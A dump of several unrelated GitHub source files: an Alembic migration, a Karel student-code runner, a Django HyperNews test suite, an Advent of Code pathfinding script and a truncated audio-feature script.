sa.Column('request_date', sa.DateTime(), nullable=False),\n sa.Column('sent_date', sa.DateTime(), nullable=True),\n sa.Column('type_code', sa.String(length=15), nullable=False),\n sa.Column('status_code', sa.String(length=15), nullable=False),\n sa.ForeignKeyConstraint(['status_code'], ['notification_status.code'], ),\n sa.ForeignKeyConstraint(['type_code'], ['notification_type.code'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('notification_contents',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('subject', sa.String(length=2000), nullable=False),\n sa.Column('body', sa.String(length=2000), nullable=False),\n sa.Column('attachment_name', sa.String(length=200), nullable=True),\n sa.Column('attachment', sa.Binary(), nullable=True),\n sa.Column('notification_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['notification_id'], ['notification.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n\n notification_type_table = table('notification_type',\n column('code', String),\n column('desc', String),\n column('default', Boolean)\n )\n\n op.bulk_insert(\n notification_type_table,\n [\n {'code': 'EMAIL', 'desc': 'The Email type of notification', 'default': True},\n {'code': 'TEXT', 'desc': 'The Text message type of notification', 'default': False}\n ]\n )\n\n # Insert codes and descriptions for organization status\n notification_status_table = table('notification_status',\n column('code', String),\n column('desc', String),\n column('default', Boolean)\n )\n op.bulk_insert(\n notification_status_table,\n [\n {'code': 'PENDING', 'desc': 'Initial state of the notification', 'default': True},\n {'code': 'DELIVERED', 'desc': 'Status for the notification sent successful', 'default': False},\n {'code': 'FAILURE', 'desc': 'Status for the notification sent failuree', 'default': False}\n ]\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notification_contents')\n op.drop_table('notification')\n op.drop_table('notification_type')\n op.drop_table('notification_status')\n # ### end Alembic commands ###\n","repo_name":"peter-freshworks/sbc-auth","sub_path":"notify-api/migrations/versions/4273ebef85cc_initial_tables.py","file_name":"4273ebef85cc_initial_tables.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"9643890933","text":"from __future__ import annotations\nfrom __future__ import absolute_import\nimport importlib.util\nimport inspect\nimport os\nimport sys\nimport traceback as tb\nimport json\nfrom types import FrameType\nfrom typing import Callable\n\n\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_program import KarelException\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_world import KarelWorld\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_application import KarelApplication\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_program import KarelProgram\nfrom code.step3_code2task.utils.codeast import json_to_ast\nfrom code.step3_code2task.sym_world import SymWorld\n\n\nclass SymCode:\n \"\"\"\n This process extracts a module from an arbitary file that contains student code.\n https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path\n \"\"\"\n\n def __init__(self, code_file: str) -> None:\n if not os.path.isfile(code_file):\n raise FileNotFoundError(f\"{code_file} could not be found.\")\n\n self.module_name = os.path.basename(code_file)\n if self.module_name.endswith(\".py\"):\n self.module_name = os.path.splitext(self.module_name)[0]\n\n spec = importlib.util.spec_from_file_location(\n self.module_name, os.path.abspath(code_file)\n )\n try:\n self.mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(self.mod) # type: ignore\n except SyntaxError as e:\n # Handle syntax errors and only print location of error\n print(f\"Syntax Error: {e}\")\n print(\"\\n\".join(tb.format_exc(limit=0).split(\"\\n\")[1:]))\n sys.exit()\n\n # Do not proceed if the student has not defined a main function.\n if not hasattr(self.mod, \"main\"):\n print(\"Couldn't find the main() function. Are you sure you have one?\")\n sys.exit()\n\n def __repr__(self) -> str:\n return inspect.getsource(self.mod)\n\n def inject_namespace(self, karel: SymWorld) -> None:\n \"\"\"\n This function is responsible for doing some Python hackery\n that associates the generic commands the student wrote in their\n file with specific commands relating to the Karel object that exists\n in the world.\n \"\"\"\n functions_to_override = [\n \"move\",\n \"turn_left\",\n \"pick_beeper\",\n \"put_beeper\",\n \"turn_right\",\n # \"facing_north\",\n # \"facing_south\",\n # \"facing_east\",\n # \"facing_west\",\n # \"not_facing_north\",\n # \"not_facing_south\",\n # \"not_facing_east\",\n # \"not_facing_west\",\n \"front_is_clear\",\n \"beepers_present\",\n \"no_beepers_present\",\n #\"beepers_in_bag\",\n #\"no_beepers_in_bag\",\n \"front_is_blocked\",\n \"left_is_blocked\",\n \"left_is_clear\",\n \"right_is_blocked\",\n \"right_is_clear\",\n #\"paint_corner\",\n #\"corner_color_is\",\n ]\n for func in functions_to_override:\n setattr(self.mod, func, getattr(karel, func))\n\n\n\n\nclass SymApplication():\n\n def __init__(\n self,\n karel: SymWorld,\n code_file: str,\n json_code_file: str\n # master: tk.Tk,\n # window_width: int = 800,\n # window_height: int = 600,\n # canvas_width: int = 600,\n # canvas_height: int = 400,\n ) -> None:\n # # set window background to contrast white Karel canvas\n # master.configure(background=LIGHT_GREY)\n #\n # # configure location of canvas to expand to fit window resizing\n # master.rowconfigure(0, weight=1)\n # master.columnconfigure(1, weight=1)\n #\n # # set master geometry\n # master.geometry(f\"{window_width}x{window_height}\")\n #\n # super().__init__(master, background=LIGHT_GREY)\n\n self.karel = karel\n self.code_file = code_file\n self.json_code_file = json_code_file\n self.num_code_blocks = self.get_num_code_blocks(self.json_code_file)\n #self.world = karel.world\n self.student_code = SymCode(code_file)\n self.student_code.inject_namespace(karel)\n #master.title(self.student_code.module_name)\n if not self.student_code.mod:\n #master.destroy()\n return\n # self.icon = DEFAULT_ICON\n # self.window_width = window_width\n # self.window_height = window_height\n # self.canvas_width = canvas_width\n # self.canvas_height = canvas_height\n # self.master = master\n # self.set_dock_icon()\n self.coverage_info = []\n self.inject_decorator_namespace()\n # self.grid(row=0, column=0)\n # self.create_menubar()\n # self.create_canvas()\n # self.create_buttons()\n # self.create_slider()\n # self.create_status_label()\n\n def get_num_code_blocks(self, json_file:str):\n\n try:\n with open(json_file, \"r\") as fp:\n code_dict = json.load(fp)\n except:\n print(\"Unable to open the json code file.\", json_file)\n exit(0)\n\n code_ast = json_to_ast(code_dict)\n if code_ast._n_if_only == 0 and code_ast._n_while == 0 and code_ast._n_repeat == 0 and code_ast._n_if_else == 0:\n self.basic_action_flag = True\n else:\n self.basic_action_flag = False\n return code_ast.size()+1 # to include the RUN block\n\n\n\n def karel_action_decorator(\n self, karel_fn: Callable[..., None]\n ) -> Callable[..., None]:\n def wrapper() -> None:\n # execute Karel function\n karel_fn()\n # redraw canvas with updated state of the world\n #self.canvas.redraw_karel()\n # delay by specified amount\n # sleep(1 - self.speed.get() / 100)\n\n return wrapper\n\n def beeper_action_decorator(\n self, karel_fn: Callable[..., None]\n ) -> Callable[..., None]:\n def wrapper() -> None:\n # execute Karel function\n karel_fn()\n # redraw canvas with updated state of the world\n # self.canvas.redraw_beepers()\n # self.canvas.redraw_karel()\n # delay by specified amount\n # sleep(1 - self.speed.get() / 100)\n\n return wrapper\n\n def corner_action_decorator(\n self, karel_fn: Callable[..., None]\n ) -> Callable[..., None]:\n def wrapper(color: str) -> None:\n # execute Karel function\n karel_fn(color)\n # redraw canvas with updated state of the world\n # self.canvas.redraw_corners()\n # self.canvas.redraw_beepers()\n # self.canvas.redraw_karel()\n # # delay by specified amount\n # sleep(1 - self.speed.get() / 100)\n\n return wrapper\n\n def inject_decorator_namespace(self) -> None:\n \"\"\"\n This function is responsible for doing some Python hackery\n that associates the generic commands the student wrote in their\n file with specific commands relating to the Karel object that exists\n in the world.\n \"\"\"\n self.student_code.mod.turn_left = self.karel_action_decorator( # type: ignore\n self.karel.turn_left\n )\n self.student_code.mod.turn_right = self.karel_action_decorator( # type: ignore\n self.karel.turn_right\n )\n self.student_code.mod.move = self.karel_action_decorator( # type: ignore\n self.karel.move\n )\n self.student_code.mod.pick_beeper = ( # type: ignore\n self.beeper_action_decorator(self.karel.pick_beeper)\n )\n self.student_code.mod.put_beeper = self.beeper_action_decorator( # type: ignore\n self.karel.put_beeper\n )\n # self.student_code.mod.paint_corner = ( # type: ignore\n # self.corner_action_decorator(self.karel.paint_corner)\n # )\n\n # def disable_buttons(self) -> None:\n # self.program_control_button.configure(state=\"disabled\")\n # self.load_world_button.configure(state=\"disabled\")\n #\n # def enable_buttons(self) -> None:\n # self.program_control_button.configure(state=\"normal\")\n # self.load_world_button.configure(state=\"normal\")\n\n def display_error_traceback(self, e: KarelException | NameError) -> None:\n print(\"Traceback (most recent call last):\")\n display_frames: list[tuple[FrameType, int]] = []\n # walk through all the frames in stack trace at time of failure\n for frame, lineno in tb.walk_tb(e.__traceback__):\n frame_info = inspect.getframeinfo(frame)\n # get the name of the file corresponding to the current frame\n filename = frame_info.filename\n # Only display frames generated within the student's code\n if self.student_code.module_name + \".py\" in filename:\n display_frames.append((frame, lineno))\n\n trace = tb.format_list(tb.StackSummary.extract(display_frames)) # type: ignore\n print(\"\".join(trace).strip())\n print(f\"{type(e).__name__}: {e}\")\n\n def run_program(self) -> None:\n ### trace the conditions\n # traced_func = trace_conditions(self.student_code.mod.main, return_conditions=True)\n # self.coverage_info = traced_func()\n self.cov = self.student_code.mod.main()\n\n\n\n\n def run_karel_program(self, input_karel_world: KarelWorld):\n\n # instance of KarelProgram\n karel_program = KarelProgram(\"\")\n karel_program.world = input_karel_world\n karel_program.avenue, karel_program.street = input_karel_world.karel_start_location[0], input_karel_world.karel_start_location[1]\n karel_program.direction = input_karel_world.karel_start_direction\n karel_program.num_beepers = input_karel_world.karel_start_beeper_count\n\n # instance of KarelApplication\n karel_app = KarelApplication(karel_program, self.code_file)\n try:\n karel_app.run_program()\n except:\n # print(\"Error in running concrete Karel Program\")\n return None\n\n return karel_app.karel.karel_seq\n\n # def reset_world(self) -> None:\n # self.karel.reset_state()\n # self.world.reset_world()\n # self.canvas.redraw_all()\n # self.status_label.configure(text=\"Reset to initial state.\", fg=\"black\")\n # # Once world has been reset, program control button resets to \"run\" mode\n # self.program_control_button[\"text\"] = \"Run Program\"\n # self.program_control_button[\"command\"] = self.run_program\n # self.update()\n #\n # def load_world(self) -> None:\n # default_worlds_path = os.path.join(os.path.dirname(__file__), \"worlds\")\n # filename = askopenfilename(\n # initialdir=default_worlds_path,\n # title=\"Select Karel World\",\n # filetypes=[(\"Karel Worlds\", \"*.w\")],\n # parent=self.master,\n # )\n # # User hit cancel and did not select file, so leave world as-is\n # if filename == \"\":\n # return\n # self.world.reload_world(filename=filename)\n # self.karel.reset_state()\n # # self.canvas.redraw_all()\n # # # Reset speed slider\n # # self.scale.set(self.world.init_speed)\n # # self.status_label.configure(\n # # text=f\"Loaded world from {os.path.basename(filename)}.\", fg=\"black\"\n # # )\n #\n # # # Make sure program control button is set to 'run' mode\n # # self.program_control_button[\"text\"] = \"Run Program\"\n # # self.program_control_button[\"command\"] = self.run_program\n","repo_name":"machine-teaching-group/aied2022_pquizsyn","sub_path":"code/step3_code2task/sym_code.py","file_name":"sym_code.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"72239465794","text":"# -*- coding: utf-8 -*-\nimport copy\nimport http.cookiejar\nimport json\nimport re\nimport urllib\nfrom datetime import datetime\nimport os\nfrom hstest import CheckResult, DjangoTest\n\n\nclass HyperNewsTest(DjangoTest):\n\n use_database = True\n\n COMMON_LINK_PATTERN = ''']+href=['\"]([a-zA-Z\\d/_]+)['\"][^>]*>'''\n CSRF_PATTERN = b']+name=\"csrfmiddlewaretoken\" ' \\\n b'value=\"(?P\\w+)\"[^>]*>'\n GROUPS_FIRST_PATTERN = '

.*?

.*?
    .+?
'\n GROUPS_SECOND_PATTERN = (\n ''']+href=['\"]([a-zA-Z\\d/_]+)['\"][^>]*>(.+?)'''\n )\n H2_PATTERN = '

(.+?)

'\n H4_PATTERN = '

(.+?)

'\n PARAGRAPH_PATTERN = '

(.+?)

'\n TEXT_LINK_PATTERN = ''']+href=['\"][a-zA-Z\\d/_]+['\"][^>]*>(.+?)'''\n cookie_jar = http.cookiejar.CookieJar()\n\n def __init__(self, *args, **kwargs):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n self.news_file_name = os.path.join(current_dir,\n os.path.join('..', 'hypernews', 'news.json'))\n if not os.path.exists(os.path.split(self.news_file_name)[0]):\n os.makedirs(os.path.split(self.news_file_name)[0])\n os.environ['NEWS_JSON_PATH'] = self.news_file_name\n super().__init__(*args, **kwargs)\n\n def __stripped_list(self, list):\n return [item.strip() for item in list]\n\n def __setup(self):\n self.news_data = [{\n 'created': '2020-02-22 16:40:00',\n 'text': 'A new star appeared in the sky.',\n 'title': 'A star is born',\n 'link': 9234732\n }, {\n 'created': '2020-02-09 14:15:10',\n 'text': 'Text of the news 1',\n 'title': 'News 1',\n 'link': 1\n }, {\n 'created': '2020-02-10 14:15:10',\n 'text': 'Text of the news 2',\n 'title': 'News 2',\n 'link': 2\n }, {\n 'created': '2020-02-09 16:15:10',\n 'text': 'Text of the news 3',\n 'title': 'News 3',\n 'link': 3\n }]\n with open(self.news_file_name, 'w') as f:\n json.dump(self.news_data, f)\n\n self.coming_soon_page_link = self.get_url()\n self.main_page_link = self.get_url() + 'news/'\n self.create_page_link = self.main_page_link + 'create/'\n\n def check_coming_soon_page(self) -> CheckResult:\n self.__setup()\n\n try:\n page = self.read_page(self.coming_soon_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the \"Coming soon\" page ({self.coming_soon_page_link}).')\n\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(self.cookie_jar))\n try:\n response = opener.open(self.coming_soon_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the \"Coming soon\" page ({self.coming_soon_page_link}).')\n\n coming_soon_text = 'Coming soon'\n\n # response.url for the backward compatibility\n if (coming_soon_text not in page\n and response.url != self.main_page_link):\n return CheckResult.wrong(\n f'\"Coming soon\" page ({self.coming_soon_page_link}) should contain \"Coming soon\" text'\n )\n\n return CheckResult.correct()\n\n def check_coming_soon_page_redirect(self) -> CheckResult:\n self.__setup()\n\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(self.cookie_jar))\n try:\n response = opener.open(self.coming_soon_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the \"Coming soon\" page ({self.coming_soon_page_link}).')\n\n if response.url != self.main_page_link:\n return CheckResult.wrong(\n f'\"Coming soon\" ({self.coming_soon_page_link}) page should redirects to the {self.main_page_link}'\n )\n\n return CheckResult.correct()\n\n def check_main_header(self) -> CheckResult:\n self.__setup()\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page {self.main_page_link}.'\n )\n\n h2_headers = re.findall(self.H2_PATTERN, page, re.S)\n h2_headers = self.__stripped_list(h2_headers)\n main_header = 'Hyper news'\n\n if len(h2_headers) != 1:\n return CheckResult.wrong(\n f'News page should contain one

element (

Hyper news

). '\n f'Now news page contain {len(h2_headers)}

elements.'\n )\n\n if main_header not in h2_headers:\n return CheckResult.wrong(\n f'Main page {self.main_page_link} should contain

element with text \"Hyper news\"'\n )\n\n return CheckResult.correct()\n\n def check_news_page(self) -> CheckResult:\n self.__setup()\n\n for testing_news in self.news_data:\n created = testing_news['created']\n text = testing_news['text']\n title = testing_news['title']\n link = testing_news['link']\n task2_example_link = 9234732\n\n try:\n page = self.read_page(self.main_page_link + f'{link}/')\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the news page at {self.main_page_link}\"link\"/ '\n 'where \"link\" is the data of the link field from json file'\n )\n\n page_headers = re.findall(self.H2_PATTERN, page, re.S)\n page_headers = self.__stripped_list(page_headers)\n page_paragraphs = re.findall(self.PARAGRAPH_PATTERN, page, re.S)\n page_paragraphs = self.__stripped_list(page_paragraphs)\n\n if len(page_headers) != 1:\n return CheckResult.wrong(\n f'News page should contain one

element with the data '\n f'of the title field from json file. '\n f'Now news page containt {len(page_headers)}

elements.'\n )\n\n if len(page_paragraphs) != 2:\n return CheckResult.wrong(\n f'News page should contain two

elements with the data '\n f'of the text field and the created field from json file. '\n f'Now news page containt {len(page_paragraphs)}

elements.'\n )\n\n page_title = page_headers[0]\n\n if title not in page_title:\n if link is task2_example_link:\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the title field from json file. '\n 'For example, the result for the data of the title field '\n f'\"{title}\" is \"{page_title}\".'\n )\n\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the title field from json file.'\n )\n\n page_created = page_paragraphs[0]\n page_text = page_paragraphs[1]\n\n if text not in page_text:\n if link is task2_example_link:\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the text field from json file. '\n 'For example, the result for the data of the text field '\n f'\"{text}\" is \"{page_text}\".'\n )\n\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the text field from json file.'\n )\n\n if created not in page_created:\n if link is task2_example_link:\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the created field from json file '\n 'in the format: \"%Y-%m-%d %H:%M:%S\". '\n 'For example, the result for the data of the created field '\n f'\"{created}\" is \"{page_created}\".'\n )\n\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the created field from json file '\n 'in the format: \"%Y-%m-%d %H:%M:%S\".'\n )\n\n return CheckResult.correct()\n\n def check_main_page_create_link(self):\n self.__setup()\n create_link = '/news/create/'\n\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page ({self.main_page_link}).'\n )\n\n links_from_page = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n if create_link not in links_from_page:\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain element with href {create_link}'\n )\n\n if len(links_from_page) - 1 != len(self.news_data):\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain {len(self.news_data) + 1} elements. '\n f'{len(self.news_data)} elements with href to news pages from the json file data '\n f'and one element with href {create_link}. '\n f'Now main page contains {len(links_from_page)} elements.'\n )\n\n return CheckResult.correct()\n\n def check_main_page(self) -> CheckResult:\n self.__setup()\n created_set = set()\n news_data = copy.deepcopy(self.news_data)\n for news in news_data:\n created_dt = datetime.strptime(news['created'],\n '%Y-%m-%d %H:%M:%S') \\\n .date()\n created_set.add(created_dt)\n\n created_list = [x for x in created_set]\n created_list.sort(reverse=True)\n created_list_str = [x.strftime('%Y-%m-%d') for x in created_list]\n\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page {self.main_page_link}.'\n )\n\n h4_headers = re.findall(self.H4_PATTERN, page, re.S)\n h4_headers = self.__stripped_list(h4_headers)\n filtered_h4 = list(filter(lambda x: x in created_list_str, h4_headers))\n page_links = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n\n if filtered_h4 != created_list_str:\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain

elements grouped by '\n 'date created and first should be fresh news.'\n )\n\n for news in news_data:\n created_date = datetime.strptime(news['created'],\n '%Y-%m-%d %H:%M:%S') \\\n .date()\n news['created_date'] = created_date\n news['created_date_str'] = created_date.strftime('%Y-%m-%d')\n news['link'] = '/news/{}/'.format(news['link'])\n\n file_data = sorted(news_data, key=lambda x: x['title'])\n file_data = sorted(\n file_data, key=lambda x: x['created_date'], reverse=True)\n\n for news in file_data:\n news.pop('created_date')\n news.pop('created')\n news.pop('text')\n\n groups = re.findall(self.GROUPS_FIRST_PATTERN, page, re.S)\n news_list = [\n sorted(re.findall(self.GROUPS_SECOND_PATTERN, group, re.S),\n key=lambda news: news[1])\n for group in groups\n ]\n response_data = []\n for news_l, h4 in zip(news_list, filtered_h4):\n for news in news_l:\n response_data.append({\n 'created_date_str': h4,\n 'link': news[0],\n 'title': news[1].strip()\n })\n\n if response_data != file_data:\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain {len(file_data)} '\n 'elements with href to news pages.'\n )\n\n return CheckResult.correct()\n\n def check_creating_news(self):\n self.__setup()\n old_news_titles = [news['title'] for news in self.news_data]\n\n new_news = {\n 'title': 'News 4',\n 'text': 'Text of the news 4',\n }\n\n titles = (*old_news_titles, new_news['title'])\n\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(self.cookie_jar))\n try:\n create_page_response = opener.open(\n self.create_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(f'Cannot connect to the create page ({self.create_page_link}).')\n\n create_page = create_page_response.read()\n\n csrf_options = re.findall(self.CSRF_PATTERN, create_page)\n if not csrf_options:\n return CheckResult.wrong(\n 'Missing csrf_token in the create page form')\n\n try:\n create_response = opener.open(\n self.create_page_link,\n data=urllib.parse.urlencode({\n 'title': new_news['title'],\n 'text': new_news['text'],\n 'csrfmiddlewaretoken': csrf_options[0],\n }).encode()\n )\n except urllib.error.URLError as err:\n if 'Forbidden' not in err.reason:\n return CheckResult.wrong(\n f'Wrong response for forbidden requests: {err.reason}')\n\n if create_response.url != self.main_page_link:\n return CheckResult.wrong(\n 'After creating news handler should redirects to the /news/ '\n 'page')\n\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page ({self.main_page_link}).'\n )\n\n links_from_page = re.findall(self.TEXT_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n for title in titles:\n if title not in links_from_page:\n return CheckResult.wrong(\n f'After creating news main page ({self.main_page_link}) can\\'t find {title}')\n\n return CheckResult.correct()\n\n def check_create_page_main_link(self):\n self.__setup()\n main_link = '/news/'\n\n try:\n page = self.read_page(self.create_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the create page ({self.create_page_link}).'\n )\n\n links_from_page = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n if main_link not in links_from_page:\n return CheckResult.wrong(\n f'Create page {self.create_page_link} should contain '\n ' element with href {main_link}'\n )\n\n return CheckResult.correct()\n\n def check_news_page_main_link(self):\n self.__setup()\n main_link = '/news/'\n\n testing_news = self.news_data[0]\n link = testing_news['link']\n\n try:\n page = self.read_page(self.main_page_link + f'{link}/')\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the news page at {self.main_page_link}\"link\"/ '\n 'where \"link\" is the data of the link field from json file'\n )\n\n links_from_page = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n if main_link not in links_from_page:\n return CheckResult.wrong(\n f'News page should contain element with href {main_link}'\n )\n\n return CheckResult.correct()\n\n def check_main_page_search(self):\n self.__setup()\n q = '2'\n news_data = copy.deepcopy(self.news_data)\n\n for news in news_data:\n created_date = datetime.strptime(news['created'],\n '%Y-%m-%d %H:%M:%S') \\\n .date()\n news['created_date_str'] = created_date.strftime('%Y-%m-%d')\n\n all_headers = set((x['created_date_str'] for x in news_data))\n visible_headers = set((x['created_date_str'] for x in news_data\n if q in x['title']))\n invisible_headers = all_headers - visible_headers\n visible_titles = [x['title'] for x in news_data\n if q in x['title']]\n invisible_titles = [x['title'] for x in news_data\n if q not in x['title']]\n\n try:\n search_page_link = self.main_page_link + f'?q={q}'\n page = self.read_page(search_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the search page.'\n )\n\n h4_headers = re.findall(self.H4_PATTERN, page, re.S)\n h4_headers = self.__stripped_list(h4_headers)\n\n for header in visible_headers:\n if header not in h4_headers:\n return CheckResult.wrong(\n 'Search page should contain headers with found news'\n )\n\n for header in invisible_headers:\n if header in h4_headers:\n return CheckResult.wrong(\n 'Search page should not contain headers with unfound news'\n )\n\n titles = re.findall(self.TEXT_LINK_PATTERN, page, re.S)\n titles = self.__stripped_list(titles)\n\n for title in visible_titles:\n if title not in titles:\n return CheckResult.wrong(\n 'Search page should contain found news'\n )\n\n for title in invisible_titles:\n if title in titles:\n return CheckResult.wrong(\n 'Search page should not contain unfound news'\n )\n\n return CheckResult.correct()\n","repo_name":"dev-mamun/news-portal","sub_path":"test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":18906,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"6067355705","text":"import numpy as np\nimport heapq\n\nwith open(\"C:\\\\Users\\\\nicoh\\\\advent_of_code_2022\\\\day_12\\\\input.txt\") as f: \n lines = f.readlines()\n\nrows = []\nfor line in lines:\n line = line.rstrip()\n rows.append(list(line))\ngrid = np.array(rows)\nstart_idx = np.argwhere(grid == \"S\")[0]\nstart_loc = (start_idx[0], start_idx[1])\nend_idx = np.argwhere(grid == \"E\")[0]\nend_loc = (end_idx[0], end_idx[1])\n\ngrid[start_loc] = 'a'\nstarting_positions = np.argwhere(grid == \"a\")\n\nno_go_length = grid.shape[0] * grid.shape[1] + 1\npath_lengths = np.ones(grid.shape) * no_go_length\n\nclass Square:\n def __init__(self, path_length, loc):\n self.path_length = path_length\n self.loc = loc\n def __lt__(self, other):\n return self.path_length < other.path_length\nsquares_to_check = []\ninitial_square = Square(0, end_loc)\nheapq.heappush(squares_to_check, initial_square)\n\n# start_found = False\nwhile len(squares_to_check) > 0:\n curr_square = heapq.heappop(squares_to_check)\n curr_height = grid[curr_square.loc]\n if curr_height == \"E\":\n curr_height = 'z'\n # check upwards\n check_loc = (curr_square.loc[0]-1, curr_square.loc[1])\n check_length = curr_square.path_length + 1\n if check_loc[0] >= 0 and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[0] >= 0 and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n # check downwards\n check_loc = (curr_square.loc[0]+1, curr_square.loc[1])\n check_length = curr_square.path_length + 1\n if check_loc[0] < grid.shape[0] and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[0] < grid.shape[0] and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n # check left\n check_loc = (curr_square.loc[0], curr_square.loc[1]-1)\n check_length = curr_square.path_length + 1\n if check_loc[1] >= 0 and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[1] >= 0 and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n # check right\n check_loc = (curr_square.loc[0], curr_square.loc[1]+1)\n check_length = curr_square.path_length + 1\n if check_loc[1] < grid.shape[1] and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[1] < grid.shape[1] and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n\nmin_length = no_go_length\nfor position in starting_positions:\n start_loc = (position[0], position[1])\n if path_lengths[start_loc] < min_length:\n min_length = path_lengths[start_loc]\n\n\n\nprint(min_length)","repo_name":"nicohiggs/advent_of_code_2022","sub_path":"day_12/problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44269032941","text":"import sys\n\nn = int(input())\n\n\ndef fast_input():\n return sys.stdin.readline().rstrip()\n\n\ncount = 0\ntotal = 0\nfor _ in range(n):\n sol = fast_input() # input을 더 빠르게 받기\n \n for ox in sol:\n if ox == 'O':\n count += 1\n total += count\n else:\n count = 0\n\n print(total)\n count, total = 0, 0 # 하나 끝나고 초기화","repo_name":"Rhange/BOJ_PS","sub_path":"_forLevels/_1Darray/8958.py","file_name":"8958.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39933896317","text":"import os\r\nimport math\r\nimport librosa\r\nimport numpy as np\r\nimport pandas as pd\r\nimport argparse\r\nimport configparser\r\n\r\nclass FeatureSave:\r\n def __init__(self, args, CFG):\r\n self.args = args\r\n self.CFG = CFG\r\n\r\n def createpath(self):\r\n myfiles = os.listdir(self.args.srcdir)\r\n pathlist = list(map(lambda filename : self.args.srcdir+\"/\"+filename, myfiles))\r\n return pathlist\r\n\r\n def writelabel(self):\r\n df = pd.read_csv(self.args.labelpath, sep='\\t', header=None, dtype=\"str\")\r\n \r\n pathnlabel = list(map(lambda i: self.args.dstdir+\"/my_npyfiles/\"+df[0][i]+\".npy\"+\"\\t\"+df[1][i][:len(np.load(self.args.dstdir+\"/my_npyfiles/\"+df[0][i]+\".npy\")+1)], range(len(df))))\r\n textfile = open(self.args.dstdir+\"/Data.txt\", \"w\")\r\n for element in pathnlabel:\r\n textfile.write(element + \"\\n\")\r\n textfile.close()\r\n\r\n def savenpy(self, path, bank):\r\n direc = self.args.dstdir+\"/my_npyfiles\"\r\n if not os.path.exists(direc):\r\n os.makedirs(direc)\r\n np.save( direc+\"/\"+(path.split(\".wav\")[0]).split(\"/\")[-1] +\".npy\", bank)\r\n \r\n def extractfeatures(self):\r\n pathlist = self.createpath()\r\n \r\n for path in pathlist:\r\n d,fs = librosa.load(path,sr=None)\r\n audio = list(map(lambda i : 